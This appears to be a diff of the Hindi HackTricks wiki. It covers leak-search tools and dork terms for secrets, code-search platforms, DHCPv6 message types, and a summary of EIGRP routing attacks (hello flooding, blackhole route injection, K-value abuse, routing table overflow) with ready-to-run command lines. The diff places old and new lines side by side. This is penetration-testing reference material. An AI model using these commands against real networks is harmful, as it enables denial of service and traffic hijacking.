### लीक्स के लिए पहले से खोजने वाले प्लेटफॉर्म ### लीक्स के लिए पहले से खोजे जाने वाले प्लेटफॉर्म
* [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/) * [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/)
### गिब में एपीआई कुंजी लीक्स ### गिटहब में एपीआई कुंजी लीक्स
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) * [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
* [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks) * [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks)
@ -321,16 +322,17 @@ GCP SECRET
AWS SECRET AWS SECRET
"private" extension:pgp "private" extension:pgp
``` ```
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,57 +1,59 @@
# Wide Source Code Search # व्यापक स्रोत कोड खोज
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, यानी [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
**Try Hard सुरक्षा समूह** **Try Hard सुरक्षा समूह**
<figure><img src="https://github.com/carlospolop/hacktricks/blob/in/generic-methodologies-and-resources/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %} {% embed url="https://discord.gg/tryhardsecurity" %}
*** ***
इस पृष्ठ का उद्देश्य है **प्लेटफॉर्मों की सूची बनाना जो हजारों/लाखों रेपो में कोड (शब्दांश या रीजेक्स) खोजने की अनुमति देती हैं** इस पृष्ठ का उद्देश्य है **प्लेटफॉर्मों की सूची बनाना जो कोड खोजने की अनुमति देती हैं** (शब्दांश या रेजेक्स) हजारों/लाखों रेपो में एक या अधिक प्लेटफॉर्मों पर
यह कई अवसरों में मदद करता है **लीक हुई जानकारी** या **सुरक्षा दोष** पैटर्न्स की खोज करने में। यह कई अवसरों में मदद करता है **लीक हुई जानकारी** या **कमजोरियों** के पैटर्न खोजने में।
* [**SourceGraph**](https://sourcegraph.com/search): मिलियनों रेपो में खोजें। एक मुफ्त संस्करण और एक एंटरप्राइज संस्करण (15 दिन की मुफ्त सेवा) है। यह रीजेक्स समर्थित करता है। * [**SourceGraph**](https://sourcegraph.com/search): मिलियनों रेपो में खोजें। एक मुफ्त संस्करण और एक एंटरप्राइज संस्करण (15 दिन का मुफ्त) है। यह रेजेक्स समर्थित करता है।
* [**Github खोज**](https://github.com/search): Github में खोजें। यह रजेक्स समर्थित करता है। * [**Github खोज**](https://github.com/search): Github में खोजें। यह रजेक्स समर्थित करता है।
* शायद यह उपयोगी हो सकता है [**Github कोड खोज**](https://cs.github.com/) भी देखना। * शायद यह उपयोगी हो सकता है [**Github कोड खोज**](https://cs.github.com/) भी देखना।
* [**Gitlab उन्नत खोज**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Gitlab परियोजनाओं में खोजें। रीजेक्स समर्थित करता है। * [**Gitlab उन्नत खोज**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Gitlab परियोजनाओं में खोजें। रेजेक्स समर्थित है।
* [**SearchCode**](https://searchcode.com/): लाखों परियोजनाओं में कोड खोजें। * [**SearchCode**](https://searchcode.com/): लाखों परियोजनाओं में कोड खोजें।
{% hint style="warning" %} {% hint style="warning" %}
जब आप किसी रेपो में लीक खोजते हैं और `git log -p` जैसी कुछ चलाते हैं, तो याद रखें कि **अन्य शाखाओं में अन्य कमिट्स** भी सीक्रेट्स को समेत सकते हैं! जब आप किसी रेपो में लीक खोजते हैं और `git log -p` जैसी कुछ चलाते हैं, तो याद रखें कि **अन्य शाखाएं भी हो सकती हैं जिनमें अन्य कमिट्स** जो सीक्रेट्स रखते हैं!
{% endhint %} {% endhint %}
**Try Hard सुरक्षा समूह** **Try Hard सुरक्षा समूह**
<figure><img src="https://github.com/carlospolop/hacktricks/blob/in/generic-methodologies-and-resources/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %} {% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, यानी [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,19 +1,20 @@
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
### DHCPv6 vs. DHCPv4 संदेश प्रकार तुलना ### DHCPv6 vs. DHCPv4 संदेश प्रकार तुलना
DHCPv6 और DHCPv4 संदेश प्रकारों की तुलनात्मक दृश्य नीचे दिए गए तालिका में प्रस्तुत किया गया है: नीचे दिए गए तालिका में DHCPv6 और DHCPv4 संदेश प्रकारों की तुलनात्मक दृश्य प्रस्तुत किया गया है:
| DHCPv6 संदेश प्रकार | DHCPv4 संदेश प्रकार | | DHCPv6 संदेश प्रकार | DHCPv4 संदेश प्रकार |
|:-------------------|:-------------------| |:-------------------|:-------------------|
@ -31,33 +32,34 @@ DHCPv6 और DHCPv4 संदेश प्रकारों की तुल
**DHCPv6 संदेश प्रकारों का विस्तृत विवरण:** **DHCPv6 संदेश प्रकारों का विस्तृत विवरण:**
1. **Solicit (1)**: DHCPv6 क्लाइंट द्वारा उपलब्ध सर्वरों को खोजने के लिए प्रारंभिक। 1. **Solicit (1)**: DHCPv6 क्लाइंट द्वारा उपलब्ध सर्वरों को खोजने के लिए प्रारंभिक।
2. **Advertise (2)**: Solicit का प्रतिसाद में सर्वरों द्वारा भेजा गया, DHCP सेवा के लिए उपलब्धता को सूचित करता है। 2. **Advertise (2)**: Solicit का प्रतिसाद में सर्वरों द्वारा भेजा गया, DHCP सेवा के लिए उपलब्धता को दर्शाता है।
3. **Request (3)**: ग्राहक इसका उपयोग विशिष्ट सर्वर से IP पते या प्रिफिक्स का अनुरोध करने के लिए करते हैं। 3. **Request (3)**: ग्राहक इसका उपयोग विशिष्ट सर्वर से IP पते या प्रिफिक्स का अनुरोध करने के लिए करते हैं।
4. **Confirm (4)**: एक ग्राहक द्वारा उनके द्वारा नेटवर्क पर अभिगमन किए गए पतों की वैधता की पुष्टि करने के लिए उपयोग किया जाता है, सामान्यत: नेटवर्क परिवर्तन के बाद। 4. **Confirm (4)**: ग्राहक द्वारा उन्हें सौंपे गए पते अब भी नेटवर्क पर वैध हैं या नहीं यह सत्यापित करने के लिए उपयोग किया जाता है, आमतौर पर नेटवर्क परिवर्तन के बाद।
5. **Renew (5)**: ग्राहक मूल सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए इसे भेजते हैं। 5. **Renew (5)**: ग्राहक मूल सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए इसे भेजते हैं।
6. **Rebind (6)**: किसी भी सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए भेजा जाता है, विशेष रूप से जब कोई प्रतिक्रिया नहीं मिलती है एक नवीनीकरण के बाद 6. **Rebind (6)**: किसी भी सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए भेजा जाता है, विशेष रूप से जब कोई प्रतिक्रिया नहीं मिलती है एक रिन्यू को
7. **Reply (7)**: सर्वर इसका उपयोग करते हैं ताकि पते, विन्यास पैरामीटर, या रिलीज या डिक्लाइन जैसे संदेशों की पुष्टि करें। 7. **Reply (7)**: सर्वर इसका उपयोग करते हैं ताकि पते, विन्यास पैरामीटर या रिलीज या डिक्लाइन जैसे संदेशों को स्वीकृति देने के लिए प्रदान करें।
8. **Release (8)**: ग्राहक सर्वर को एक या एक से अधिक निर्धारित पतों का उपयोग बंद करने की सूचना देते हैं। 8. **Release (8)**: ग्राहक सर्वर को एक या एक से अधिक सौंपे गए पतों का उपयोग बंद करने की सूचना देते हैं।
9. **Decline (9)**: ग्राहक द्वारा भेजा गया है कि नेटवर्क पर निर्धारित पते संघर्ष में हैं। 9. **Decline (9)**: ग्राहक द्वारा रिपोर्ट किया जाता है कि नेटवर्क पर सौंपे गए पते संघर्ष में हैं।
10. **Reconfigure (10)**: सर्वर ग्राहकों को नए या अपडेट किए गए विन्यास के लिए लेन-देन आरंभ करने के लिए प्रोत्साहित करते हैं। 10. **Reconfigure (10)**: सर्वर ग्राहकों को नए या अपडेटेड विन्यास के लिए लेनदेन आरंभ करने के लिए प्रोत्साहित करते हैं।
11. **Information-Request (11)**: ग्राहक आईपी पता निर्धारण के बिना विन्यास पैरामीटर अनुरोध करते हैं। 11. **Information-Request (11)**: ग्राहक आईपी पता सौंपन के बिना विन्यास पैरामीटर अनुरोध करते हैं।
12. **Relay-Forw (12)**: रिले एजेंट संदेशों को सर्वरों को आगे भेजते हैं। 12. **Relay-Forw (12)**: रिले एजेंट संदेशों को सर्वरों को आगे भेजते हैं।
13. **Relay-Repl (13)**: सर्वर रिले एजेंट्स को उत्तर देते हैं, जो फिर मैसेज को ग्राहक को पहुंचाते हैं। 13. **Relay-Repl (13)**: सर्वर रिले एजेंट्स को जवाब देते हैं, जो फिर मैसेज को ग्राहक को पहुंचाते हैं।
## संदर्भ ## संदर्भ
* [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages) * [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>HackTricks का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,52 +1,53 @@
# EIGRP हमले # EIGRP हमले
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
**यह उन हमलों का सारांश है जो** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **में उजागर किए गए है** अधिक जानकारी के लिए इसे देखें। **यह** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **में उजागर किए गए हमलों का सारांश है। अधिक जानकारी के लिए इसे देखें।**
## **फेक EIGRP पड़ोसियों हमला** ## **फेक EIGRP पड़ोसियों हमला**
- **उद्देश्य**: EIGRP हैलो पैकेट्स से राउटर CPU को ओवरलोड करना, जो संभावित रूप से एक सेवा की असुरक्षितता (DoS) हमले तक जा सकता है। - **उद्देश्य**: EIGRP हैलो पैकेट्स से राउटर CPU को ओवरलोड करना, जिससे एक डिनायल ऑफ सर्विस (DoS) हमला हो सकता है।
- **उपकरण**: **helloflooding.py** स्क्रिप्ट। - **उपकरण**: **helloflooding.py** स्क्रिप्ट।
- **अमल**: - **अमल**:
%%%bash %%%bash
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
%%% %%%
- **पैरामीटर**: - **पैरामीटर**:
- `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है, जैसे `eth0` - `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है, जैसे, `eth0`
- `--as`: EIGRP स्वतंत्र प्रणाली संख्या को परिभाषित करता है, जैसे `1` - `--as`: EIGRP स्वतंत्र सिस्टम नंबर को परिभाषित करता है, जैसे, `1`
- `--subnet`: उपनेट स्थान को सेट करता है, जैसे `10.10.100.0/24` - `--subnet`: सबनेट स्थान को सेट करता है, जैसे, `10.10.100.0/24`
## **EIGRP ब्लैकहोल हमला** ## **EIGRP ब्लैकहोल हमला**
- **उद्देश्य**: एक गलत रूट डालकर नेटवर्क ट्रैफिक फ्लो को विघटित करना, जिससे एक काले गड्ढे की ओर ले जाता है जहां ट्रैफिक एक अस्तित्वहीन गंतव्य की ओर निर्देशित होता है। - **उद्देश्य**: एक गलत रूट डालकर नेटवर्क ट्रैफिक फ्लो को व्यवस्थित करना, जिससे एक ब्लैकहोल बनाया जाता है जहां ट्रैफिक एक अस्तित्वहीन गंतव्य की ओर निर्देशित होता है।
- **उपकरण**: **routeinject.py** स्क्रिप्ट। - **उपकरण**: **routeinject.py** स्क्रिप्ट।
- **अमल**: - **अमल**:
%%%bash %%%bash
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
%%% %%%
- **पैरामीटर**: - **पैरामीटर**:
- `--interface`: हमले करने वाले सिस्टम इंटरफेस को निर्दिष्ट करता है। - `--interface`: हमलावर सिस्टम इंटरफेस को निर्दिष्ट करता है।
- `--as`: EIGRP AS संख्या को परिभाषित करता है। - `--as`: EIGRP AS नंबर को परिभाषित करता है।
- `--src`: हमले करने वाले का IP पता सेट करता है। - `--src`: हमलावर का IP पता सेट करता है।
- `--dst`: लक्ष्य सबनेट IP को सेट करता है। - `--dst`: लक्ष्य सबनेट IP को सेट करता है।
- `--prefix`: लक्ष्य सबनेट IP का मास्क परिभाषित करता है। - `--prefix`: लक्ष्य सबनेट IP का मास्क परिभाषित करता है।
## **K-मानों का दुरुपयोग हमला** ## **K-मानों का दुरुपयोग हमला**
- **उद्देश्य**: संशोधित K-मानों को डालकर EIGRP डोमेन में निरंतर विघटन और पुनर्संयोजन बनाना, जिससे एक सेवा की असुरक्षितता हमला हो। - **उद्देश्य**: संशोधित K-मानों को इंजेक्ट करके EIGRP डोमेन में निरंतर विघटन और पुनर्संयोजनाएं बनाना, जिससे एक DoS हमला हो।
- **उपकरण**: **relationshipnightmare.py** स्क्रिप्ट। - **उपकरण**: **relationshipnightmare.py** स्क्रिप्ट।
- **अमल**: - **अमल**:
%%%bash %%%bash
@ -54,12 +55,12 @@ HackTricks का समर्थन करने के अन्य तरी
%%% %%%
- **पैरामीटर**: - **पैरामीटर**:
- `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है। - `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है।
- `--as`: EIGRP AS संख्या को परिभाषित करता है। - `--as`: EIGRP AS नंबर को परिभाषित करता है।
- `--src`: वैध राउटर का IP पता सेट करता है। - `--src`: वैध राउटर का IP पता सेट करता है।
## **रूटिंग तालिका ओवरफ्लो हमला** ## **रूटिंग तालिका ओवरफ्लो हमला**
- **उद्देश्य**: राउटर की CPU और RAM को ताकत देने के लिए नकली रूटों से रूटिंग तालिका को भरना। - **उद्देश्य**: नकली रूटों के साथ रूटर का CPU और RAM को तनाव देना।
- **उपकरण**: **routingtableoverflow.py** स्क्रिप्ट। - **उपकरण**: **routingtableoverflow.py** स्क्रिप्ट।
- **अमल**: - **अमल**:
%%%bash %%%bash
@ -67,5 +68,21 @@ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
%%% %%%
- **पैरामीटर**: - **पैरामीटर**:
- `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है। - `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है।
- `--as`: EIGRP AS संख्या को परिभाषित करता है। - `--as`: EIGRP AS नंबर को परिभाषित करता है।
